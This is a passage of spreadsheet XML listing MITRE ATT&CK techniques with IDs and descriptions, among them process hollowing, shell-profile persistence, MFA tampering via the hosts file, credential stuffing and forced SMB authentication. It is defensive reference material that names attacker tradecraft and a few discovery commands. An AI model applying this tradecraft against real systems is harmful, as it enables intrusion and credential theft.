Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)
https://attack.mitre.org/techniques/T1559</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
https://attack.mitre.org/techniques/T1001</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
https://attack.mitre.org/techniques/T1039</t>
  </si>
  <si>
    <t>T1584.006</t>
  </si>
  <si>
    <t>Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.
https://attack.mitre.org/techniques/T1584/006</t>
  </si>
  <si>
    <t>T1601</t>
  </si>
  <si>
    <t>Modify System Image</t>
  </si>
  <si>
    <t>Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.
https://attack.mitre.org/techniques/T1601</t>
  </si>
  <si>
    <t>T1574</t>
  </si>
  <si>
    <t>Hijack Execution Flow</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.
https://attack.mitre.org/techniques/T1574</t>
  </si>
  <si>
    <t>T1059.011</t>
  </si>
  <si>
    <t>Lua</t>
  </si>
  <si>
    <t>Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (&lt;code&gt;.lua&lt;/code&gt;), or from Lua-embedded programs (through the &lt;code&gt;struct lua_State&lt;/code&gt;).(Citation: Lua main page)(Citation: Lua state)
Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
https://attack.mitre.org/techniques/T1059/011</t>
  </si>
  <si>
    <t>T1027.005</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
https://attack.mitre.org/techniques/T1027/005</t>
  </si>
  <si>
    <t>T1204.003</t>
  </si>
  <si>
    <t>Malicious Image</t>
  </si>
  <si>
    <t>Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)
https://attack.mitre.org/techniques/T1204/003</t>
  </si>
  <si>
    <t>T1543.005</t>
  </si>
  <si>
    <t>Container Service</t>
  </si>
  <si>
    <t>Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host.
For example, by using the `docker run` or `podman run` command with the `restart=always` directive, a container can be configured to persistently restart on the host.(Citation: AquaSec TeamTNT 2023) A user with access to the (rootful) docker command may also be able to escalate their privileges on the host.(Citation: GTFOBins Docker)
In Kubernetes environments, DaemonSets allow an adversary to persistently [Deploy Container](https://attack.mitre.org/techniques/T1610)s on all nodes, including ones added later to the cluster.(Citation: Aquasec Kubernetes Attack 2023)(Citation: Kubernetes DaemonSet) Pods can also be deployed to specific nodes using the `nodeSelector` or `nodeName` fields in the pod spec.(Citation: Kubernetes Assigning Pods to Nodes)(Citation: AppSecco Kubernetes Namespace Breakout 2020)
Note that containers can also be configured to run as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation: Podman Systemd)(Citation: Docker Systemd)
https://attack.mitre.org/techniques/T1543/005</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)
The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)
https://attack.mitre.org/techniques/T1078</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)
https://attack.mitre.org/techniques/T1571</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. 
Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
https://attack.mitre.org/techniques/T1585/001</t>
  </si>
  <si>
    <t>T1055.012</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  
Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as &lt;code&gt;CreateProcess&lt;/code&gt;, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as &lt;code&gt;ZwUnmapViewOfSection&lt;/code&gt; or &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;  before being written to, realigned to the injected code, and resumed via &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)
This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/012</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.
Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).
https://attack.mitre.org/techniques/T1068</t>
  </si>
  <si>
    <t>T1564.009</t>
  </si>
  <si>
    <t>Resource Forking</t>
  </si>
  <si>
    <t>Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using &lt;code&gt;ls -l@&lt;/code&gt; or &lt;code&gt;xattr -l&lt;/code&gt; commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the &lt;code&gt;/Resources&lt;/code&gt; folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
https://attack.mitre.org/techniques/T1564/009</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;Set-LocalUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountPassword&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the &lt;code&gt;passwd&lt;/code&gt; utility may be used to change passwords. Accounts could also be disabled by Group Policy. 
Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.
https://attack.mitre.org/techniques/T1531</t>
  </si>
  <si>
    <t>T1110.004</t>
  </si>
  <si>
    <t>Credential Stuffing</t>
  </si>
  <si>
    <t>Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
https://attack.mitre.org/techniques/T1110/004</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. 
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
https://attack.mitre.org/techniques/T1027</t>
  </si>
  <si>
    <t>T1556.006</t>
  </si>
  <si>
    <t>Multi-Factor Authentication</t>
  </si>
  <si>
    <t>Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.
Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)
For example, modifying the Windows hosts file (`C:\windows\system32\drivers\etc\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) 
Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022)
https://attack.mitre.org/techniques/T1556/006</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.
https://attack.mitre.org/techniques/T1114/002</t>
  </si>
  <si>
    <t>T1505.004</t>
  </si>
  <si>
    <t>IIS Components</t>
  </si>
  <si>
    <t>Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: &lt;code&gt;Get{Extension/Filter}Version&lt;/code&gt;, &lt;code&gt;Http{Extension/Filter}Proc&lt;/code&gt;, and (optionally) &lt;code&gt;Terminate{Extension/Filter}&lt;/code&gt;. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)
Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports &lt;code&gt;RegisterModule&lt;/code&gt;, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)
https://attack.mitre.org/techniques/T1505/004</t>
  </si>
  <si>
    <t>T1036.001</t>
  </si>
  <si>
    <t>Invalid Code Signature</t>
  </si>
  <si>
    <t>Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.
https://attack.mitre.org/techniques/T1036/001</t>
  </si>
  <si>
    <t>T1564.006</t>
  </si>
  <si>
    <t>Run Virtual Instance</t>
  </si>
  <si>
    <t>Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)
https://attack.mitre.org/techniques/T1564/006</t>
  </si>
  <si>
    <t>T1027.014</t>
  </si>
  <si>
    <t>Polymorphic Code</t>
  </si>
  <si>
    <t>Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone) 
Other obfuscation techniques can be used in conjunction with polymorphic code to accomplish the intended effects, including using mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation: polymorphic-medium)
https://attack.mitre.org/techniques/T1027/014</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as &lt;code&gt;net accounts (/domain)&lt;/code&gt;, &lt;code&gt;Get-ADDefaultDomainPasswordPolicy&lt;/code&gt;, &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;, &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt;, and &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt; (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. &lt;code&gt;show aaa&lt;/code&gt;, &lt;code&gt;show aaa common-criteria policy all&lt;/code&gt;).(Citation: US-CERT-TA18-106A)
Password policies can be discovered in cloud environments using available APIs such as &lt;code&gt;GetAccountPasswordPolicy&lt;/code&gt; in AWS (Citation: AWS GetPasswordPolicy).
https://attack.mitre.org/techniques/T1201</t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>Event Triggered Execution</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)
Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)
Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.
https://attack.mitre.org/techniques/T1546</t>
  </si>
  <si>
    <t>T1546.004</t>
  </si>
  <si>
    <t>Unix Shell Configuration Modification</t>
  </si>
  <si>
    <t>Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (&lt;code&gt;/etc&lt;/code&gt;) and the user’s home directory (&lt;code&gt;~/&lt;/code&gt;) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. 
Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt; files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into &lt;code&gt;~/.bash_profile&lt;/code&gt;, &lt;code&gt;~/.bash_login&lt;/code&gt;, or &lt;code&gt;~/.profile&lt;/code&gt; which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used &lt;code&gt;~/.bash_profile&lt;/code&gt; to ensure execution. Adversaries have also leveraged the &lt;code&gt;~/.bashrc&lt;/code&gt; file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the &lt;code&gt;~/.bash_logout&lt;/code&gt; file to execute malicious commands at the end of a session. 
For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using &lt;code&gt;/etc/profile&lt;/code&gt;, &lt;code&gt;/etc/zshenv&lt;/code&gt;, &lt;code&gt;/etc/zprofile&lt;/code&gt;, and &lt;code&gt;/etc/zlogin&lt;/code&gt;.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with &lt;code&gt;~/.zprofile&lt;/code&gt; and &lt;code&gt;~/.zlogin&lt;/code&gt;. The interactive shell uses the &lt;code&gt;~/.zshrc&lt;/code&gt; to configure the user environment. Upon exiting, &lt;code&gt;/etc/zlogout&lt;/code&gt; and &lt;code&gt;~/.zlogout&lt;/code&gt; are executed. For legacy programs, macOS executes &lt;code&gt;/etc/bashrc&lt;/code&gt; on startup.
https://attack.mitre.org/techniques/T1546/004</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
